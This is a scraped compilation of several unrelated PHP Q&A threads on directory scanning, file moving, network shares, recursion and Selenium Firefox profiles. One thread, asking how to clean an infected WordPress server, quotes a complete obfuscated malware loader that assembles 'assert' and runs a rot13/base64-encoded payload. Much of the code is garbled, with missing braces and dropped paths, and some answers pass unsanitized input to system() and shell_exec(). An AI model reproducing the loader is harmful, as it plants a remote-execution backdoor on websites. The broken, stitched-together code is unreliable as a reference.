PHP scandir and relative path - php

I've tried all the solutions I read on here but can't seem to get this to work.
I'm trying to call scandir in this file:
to list all the files and directories in this folder:
I don't want to hardcode the part because this will be different depending on the site. I've tried many combinations of: dirname(FILE), DIR, $_SERVER['SERVER_NAME'], and $_SERVER['REQUEST_URI'], etc. I either get a "failed to open dir, not implemented in..." error or nothing displays at all. Here is the code I'm using:
$directory = __DIR__ . '/../../uploads';
$filelist = "";
$dircont = scandir($directory);
foreach($dircont AS $item)
if(is_file($item) && $item[0]!='.')
$filelist .= ''.$item.''."<br />\n";
echo $filelist;
What's the proper way to do this?

The $directory variable is set wrong. If you want to go 2 directories up use dirname() like this:
$directory = dirname(__DIR__,2) . '/uploads';
$filelist = "";
$dircont = scandir($directory);
foreach($dircont AS $item) {
if(is_file($item) && $item[0]!='.')
$filelist .= ''.$item.''."<br />\n";
echo $filelist;
You can read more about scandir there is a section on how to use it with urls if allow_url_fopen is enabled but this is mainly in local/development environment.

Sorry, i am not able to write a comment to ask you a question( low reputation ).
As far as i understand from your explanation, you wanted to add possible folder names to make your probe in a way will work automatically.
If yes, then i would do such piece of code like this;
$website = 'http://localhost/';
$folders = array('uploads','files', 'uploads/files');
$filelist = "";
foreach ($folders as $kinky)
$dircont = scandir($website.$kinky);
foreach ($dircont AS $item)
if (is_file($item) && $item[0] != '.')
$filelist .= '' . $item . '' . "<br />\n";
echo $filelist;
Hope it helps :)


PHP read each .php file and search for code, not string

Long story short, my server was infected through an old wordpress install. I found the leak and now I have to clean up all of the affected files. All files that were affected were given a block of code, which is the same across all affected files.
I'm trying to loop through my server directory, search for this block of code then delete it and save the file.
There are a couple of problems that might make this hard.
The stuff I'm looking for is PHP code and I'm not sure the way I'm doing this will look for a specific string in a code block, rather it will only look for strings
My host has changed the permissions on any of these files to 200, so I need to change these to 604 or 777 (temporarily) to be able to open, change and save the files.
This is what I have so far:
function getDirContents($dir, $mal) {
$files = scandir($dir);
foreach($files as $file) {
if($file == "." || $file == "..") continue;
if(!is_file($dir . $file)){
//echo "Folder: " . $dir . $file . "<br />";
getDirContents($dir.$file."/", $mal);
} else {
//echo "File: " . $dir . $file . "<br />";
$content = file_get_contents($dir . $file);
if (strpos($content, $mal) !== false) {
echo "FOUND" . $dir.$file . "<br>";
$dir = "./";
$mal = "//###=CACHE START=###";
getDirContents($dir, $mal);
So, I am searching for this specific comment: //###=CACHE START=###. This is the same in every affected file, but I can not seem to search for it.
I haven't gotten to the deleting of the code block yet, but I am trying to remove this from each file:
//###=CACHE START=###
assert_options(ASSERT_ACTIVE, 1);
assert_options(ASSERT_WARNING, 0);
assert_options(ASSERT_QUIET_EVAL, 1); $strings = "as";$strings .= "sert"; $strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUftMKWlo3WspzIjo3W0nJ5aXQNcBjccozysp2I0XPWxnKAjoTS5K2Ilpz9lplVfVPVjVvx7PzyzVPtunKAmMKDbWTyvqvxcVUfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxcVTEcMFtxK0ACG0gWEIfvL2kcMJ50K2AbMJAeVy0cBjccMvujpzIaK21uqTAbXPpuKSZuqFpfVTMcoTIsM2I0K2AioaEyoaEmXPEsH0IFIxIFJlWGD1WWHSEsExyZEH5OGHHvKFxcXFNxLlN9VPW1VwftMJkmMFNxLlN9VPW3VwfXWTDtCFNxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKGfXWUHtCFNxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy07PvEcpPN9VPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqBjbxqKWfVQ0tVzu0qUN6Yl8kAwDhZGZlYwD0YwR4BP9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEcpPxhVvMxCFVhqKWfMJ5wo2EyXPExXF4vWaH9Vv51pzkyozAiMTHbWUHcYvVzLm0vYvEwYvVznG0kWzt9Vv5gMQHbVwt2LGV2ZmWxZGp0MGIvAJV2ZJVjAGpmZJV5LwOyZGOzVv4xMP4xqF4xLl4vZFVcBjccMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsFOyoUAynJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1WSISIFGyEFDH5GExIFYPOHHyISXGfXWUWyp3IfqPN9VTA1pzksMKuyLltxL2tcBjcwqKWfK2Afo3AyXPEwnPx7PvEcLaLtCFNxpzImqJk0Bjc9VTIfp2HtrjbxMaNtCFOzp29wn29jMJ4bVwR2AP4kZmVhAQDhZGt4VvjtBQNfVPEypaWholjtWTIlpaA0pvjtZmNcBjccMvNbWTMjXFO7PvNtVPNxo3I0VQ0tVxqSIPNiM2I0YaObpQ9cpQ0vYaIloTIhL29xMFtxnKNcYvVzMQ0vYaIloTIhL29xMFtxMPxhVvM1CFVhqKWfMJ5wo2EyXPE1XF4vWzZ9Vv4xLl4vWzx9ZFMbCFVhoJD1XPV4AzRlAwZlMQR3ATH1LwIvAwSvZQH3ZmSvBJVjMGRjMvVhWTDhWUHhWTZhVwRvXF4vVRuHISNiZF4kKUWpovV7PvNtVPNxo3I0VP49VPWVo3A0BvNkAwDhZGZlYwD0YwR4BSklKT4vBjbtVPNtWT91qPNhCFNvD29hozIwqTyiowbtD2kip2IppykhKUWpovV7PvNtVPOzq3WcqTHbWTMjYPNxo3I0XGfXVPNtVPElMKAjVQ0tVvV7PvNtVPO3nTyfMFNbVJMyo2LbWTMjXFxtrjbtVPNtVPNtVPElMKAjVP49VTMaMKEmXPEzpPjtZGV4XGfXVPNtVU0XVPNtVTMwoT9mMFtxMaNcBjbtVPNtoTymqPtxnTIuMTIlYPNxLz9xrFxtCFOjpzIaK3AjoTy0XPViKSWpHv8vYPNxpzImpPjtZvx7PvNtVPNxnJW2VQ0tWTWiMUx7Pa0XsDc9BjccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVzSuZmR3MzWzVvxtrlOyqzSfXUA0pzyjp2kup2uypltxK1WSHIISH1EoVzZvKFxcBlO9PzIwnT8tWTyvqwg9"));'));
//###=CACHE END=###
Any advice?

PHP - Moving multiple files with different files names to own directory

Hi wonder if you can help,
I'm looking to do this in PHP if someone can help me. I have a number of files that look like this:
Basically I want to create a PHP code that when someone ftp uploads those files to the upload folder that it will 1) Create a directory if it doesn't exist using there name 2) Move the files to the correct directory (E.g. JoePharnel to the JoePharnel Directory ignoring the number at the beginning)
I have looked through alot of code and found this code and have adapted it:
$attachments = array();
preg_match_all('/([^\[]+)\[([^\]]+)\],?/', $attachments, $matches, PREG_SET_ORDER);
foreach ($matches as $file) {
$attachments[$file[1]] = $file[2];
foreach ($attachments as $file => $filename) {
$uploaddir = "upload" . $file;
$casenumdir = "upload/JoePharnel" . $CaseNumber;
$newfiledir = "upload/JoePharnel" . $CaseNumber .'/'. $file;
$each_file = $CaseNumber .'/'. $file;
mkdir("$casenumdir", 0700); // Create directory if it does not exist
chmod ($uploaddir, 0777);
$allfiles = $CaseNumber .'/'. $file . "[" . $filename . "]" . ",";
$filelistfinished = preg_replace("/,$/", "", $allfiles);
echo $filelistfinished;
// displays multiple file attachments on the page correctly as: casenumber/testfile1.pdf[testfile1.pdf],casenumber/testfile2.pdf[testfile2.pdf],
Sorry for the lack of code but best i could find.
Any help is much appreciated.

php read a directory or file from a network

I've been trying to no avail to read either a directory or a file from a network using PHP. The operation works fine if the directories are local but, I have had ZERO luck with the network. My system admin told me that the folders I'm trying to accessed are shared. I can also read the files using python. There are two folders in question I want to access, one with a user name and password while the other one has no protection. For the sake of this particular problem I would be happy just to be able to access the one without the password protection. All it has in it is a junk file that i put there as an experiment. The code in question which is a simple experiment code is found below.
The error I received is:
Warning: opendir(M:,M:): The system cannot find the path specified. (code:" 3)
$location = "\\\\\\geo";
$user = "";
$pass = "";
$letter = "M";
system("net use ".$letter.": \"".$location."\" ".$pass." /user:".$user." /persistent:no>nul 2>&1");
$dir = $letter . ":";
if($dh = opendir($dir)){
while(($file = readdir($dh)) !== false){
echo "filename: $file : filetype: ".filetype($dir . $file) . "\n";
Try to change:
From: $dir = $letter . ":";
To: $dir = $letter . ":/"; // or $dir = $letter . ":\\";
The slash tends to matter sometimes in some cases.
After, try to setup your webserver to accept the directory mapped:
<Directory "M:\Path\To\Your\Directory">
Order Deny,Allow
Allow from all

Filepaths and Recursion in PHP

I'm trying to recursively iterate through a group of dirs that contain either files to upload or another dir to check for files to upload.
So far, I'm getting my script to go 2 levels deep into the filesystem, but I haven't figured out a way to keep my current full filepath in scope for my function:
function getPathsinFolder($basepath = null) {
$fullpath = 'www/doc_upload/test_batch_01/';
$files = scandir($fullpath . $basepath . '/');
$files = scandir($fullpath);
$one = array_shift($files); // to remove . & ..
$two = array_shift($files);
foreach($files as $file):
$type = filetype($fullpath . $file);
print $file . ' is a ' . $type . '<br/>';
if($type == 'dir'):
elseif(($type == 'file')):
So, everytime I call getPathsinFolder I have the basepath I started with plus the current name of the directory I'm scandirring. But I'm missing the intermediate folders in between. How to keep the full current filepath in scope?
Very simple. If you want recursion, you need to pass the whole path as a parameter when you call your getPathsinFolder().
Scanning a large directory tree might be more efficient using a stack to save the intermediate paths (which would normally go on the heap), rather than use much more of the system stack (it has to save the path as well as a whole frame for the next level of the function call.
Thank you. Yes, I needed to build the full path inside the function. Here is the version that works:
function getPathsinFolder($path = null) {
$files = scandir($path);
else: // Default path
$path = 'www/doc_upload/';
$files = scandir($path);
// Remove . & .. dirs
$remove_onedot = array_shift($files);
$remove_twodot = array_shift($files);
foreach($files as $file):
$type = filetype($path . '/' . $file);
print $file . ' is a ' . $type . '<br/>';
$fullpath = $path . $file . '/';
if($type == 'dir'):
elseif(($type == 'file')):

Selenium2 firefox: use the default profile

Selenium2, by default, starts firefox with a fresh profile. I like that for a default, but for some good reasons (access to my bookmarks, saved passwords, use my add-ons, etc.) I want to start with my default profile.
There is supposed to be a property controlling this but I think the docs are out of sync with the source, because as far as I can tell webdriver.firefox.bin is the only one that works. E.g. starting selenium with:
java -jar selenium-server-standalone-2.5.0.jar -Dwebdriver.firefox.bin=not-there
works (i.e. it complains). But this has no effect:
java -jar selenium-server-standalone-2.5.0.jar -Dwebdriver.firefox.profile=default
("default" is the name in profiles.ini, but I've also tried with "Profile0" which is the name of the section in profiles.ini).
I'm using PHPWebdriver (which uses JsonWireProtocol) to access:
$webdriver = new WebDriver("localhost", "4444");
I tried doing it from the PHP side:
$webdriver->connect("firefox","",array('profile'=>'default') );
$webdriver->connect("firefox","",array('profile'=>'Profile0') );
with no success (firefox starts, but not using my profile).
I also tried the hacker's approach of creating a batch file:
/usr/bin/firefox -P default
And then starting Selenium with:
java -jar selenium-server-standalone-2.5.0.jar -Dwebdriver.firefox.bin="/usr/local/src/selenium/myfirefox"
Firefox starts, but not using by default profile and, worse, everything hangs: selenium does not seem able to communicate with firefox when started this way.
P.S. I saw Selenium - Custom Firefox profile I tried this:
java -jar selenium-server-standalone-2.5.0.jar -firefoxProfileTemplate "not-there"
And it refuses to run! Excited, thinking I might be on to something, I tried:
java -jar selenium-server-standalone-2.5.0.jar -firefoxProfileTemplate /path/to/0abczyxw.default/
This does nothing. I.e. it still starts with a new profile :-(
Simon Stewart answered this on the mailing list for me.
To summarize his reply: you take your firefox profile, zip it up (zip, not tgz), base64-encode it, then send the whole thing as a /session json request (put the base64 string in the firefox_profile key of the Capabilities object).
An example way to do this on Linux:
cd /your/profile
zip -r profile *
base64 >
And then if you're using PHPWebDriver when connecting do:
$webdriver->connect("firefox", "", array("firefox_profile" => file_get_contents("/your/profile/")))
NOTE: It still won't be my real profile, rather a copy of it. So bookmarks won't be remembered, the cache won't be filled, etc.
Here is the Java equivalent. I am sure there is something similar available in php.
ProfilesIni profile = new ProfilesIni();
FirefoxProfile ffprofile = profile.getProfile("default");
WebDriver driver = new FirefoxDriver(ffprofile);
If you want to additonal extensions you can do something like this as well.
ProfilesIni profile = new ProfilesIni();
FirefoxProfile ffprofile = profile.getProfile("default");
ffprofile.addExtension(new File("path/to/my/firebug.xpi"));
WebDriver driver = new FirefoxDriver(ffprofile);
java -jar selenium-server-standalone-2.21.0.jar -Dwebdriver.firefox.profile=default
should work. the bug is fixed.
Just update your selenium-server.
I was curious about this as well and what I got to work was very simple.
I use the command /Applications/ -P to bring up Profile Manager. After I found which profile I needed to use I used the following code to activate the profile browser = Selenium::WebDriver.for :firefox, :profile => "batman".
This pulled all of my bookmarks and plug-ins that were associated with that profile.
Hope this helps.
From my understanding, it is not possible to use the -Dwebdriver.firefox.profile=<name> command line parameter since it will not be taken into account in your use case because of the current code design. Since I faced the same issue and did not want to upload a profile directory every time a new session is created, I've implemented this patch that introduces a new firefox_profile_name parameter that can be used in the JSON capabilities to target a specific Firefox profile on the remote server. Hope this helps.
I did It in Zend like this:
public function indexAction(){
$appdata = 'C:\Users\randomname\AppData\Roaming\Mozilla\Firefox' . "\\";
$temp = 'C:\Temp\\';
$hash = md5(rand(0, 999999999999999999));
shell_exec("\"C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe\" -CreateProfile " . $hash);
$hash = $this->params['p'];
$ini = new Zend_Config_Ini('C:\Users\randomname\AppData\Roaming\Mozilla\Firefox\profiles.ini');
$path = false;
foreach ($ini as $key => $value){
if(isset($value->Name) && $value->Name == $hash){
$path = $value->Path;
if($path === false){
die('<pre>No profile found with name: ' . $hash);
echo "<pre>Profile : $hash \nProfile Path : " . $appdata . "$path \n";
echo "Files: \n";
$filesAndDirs = $this->getAllFiles($appdata . $path);
$files = $filesAndDirs[0];
foreach ($files as $file){
echo " $file\n";
echo "Dirs : \n";
$dirs = array_reverse($filesAndDirs[1]);
foreach ($dirs as $dir){
echo " $dir\n";
echo 'Zipping : ';
$zip = new ZipArchive();
$zipPath = md5($path) . "";
$zipRet = $zip->open($temp .$zipPath, ZipArchive::CREATE);
echo ($zipRet === true)?"Succes\n":"Error $zipRet\n";
echo "Zip name : $zipPath\n";
foreach ($dirs as $dir){
$zipRet = $zip->addEmptyDir($dir);
if(!($zipRet === true) ){
echo "Error creating folder: $dir\n";
foreach ($files as $file){
$zipRet = $zip->addFile($appdata . $path ."\\". $file,$file);
if(!($zipRet === true && file_exists($appdata . $path . "\\". $file) && is_readable($appdata . $path . "\\". $file))){
echo "Error zipping file: $appdata$path/$file\n";
$zipRet = $zip->addFile($appdata . $path ."\\prefs.js",'user.js');
if(!($zipRet === true && file_exists($appdata . $path . "\\". $file) && is_readable($appdata . $path . "\\". $file))){
echo "Error zipping file: $appdata$path/$file\n";
$zipRet = $zip->close();
echo "Closing zip : " . (($zipRet === true)?("Succes\n"):("Error:\n"));
if($zipRet !== true){
echo "Reading zip in string\n";
$zipString = file_get_contents($temp .$zipPath);
echo "Encoding zip\n";
$zipString = base64_encode($zipString);
echo $zipString . "\n";
require 'webdriver.php';
echo "Connecting Selenium\n";
$webDriver = new WebDriver("localhost",'4444');
die('Selenium is not running');
private function getAllFiles($path,$WithPath = false){
$return = array();
$dirs = array();
if (is_dir($path)) {
if ($dh = opendir($path)) {
while (($file = readdir($dh)) !== false) {
if(!in_array($file, array('.','..'))){
if(is_dir($path . "\\" . $file)){
$returned = $this->getAllFiles($path . "\\" . $file,(($WithPath==false)?'':$WithPath) . $file . "\\");
$return = array_merge($return,$returned[0]);
$dirs = array_merge($dirs,$returned[1]);
$dirs[] = (($WithPath==false)?'':$WithPath) . $file;
$return[] = (($WithPath==false)?'':$WithPath) . $file;
return array($return,$dirs);
The Idea is that you give in the get/post/zend parameters P with the name of the profile if not a random wil be created, and he will zip all the files put it in the temp folder and put it in.
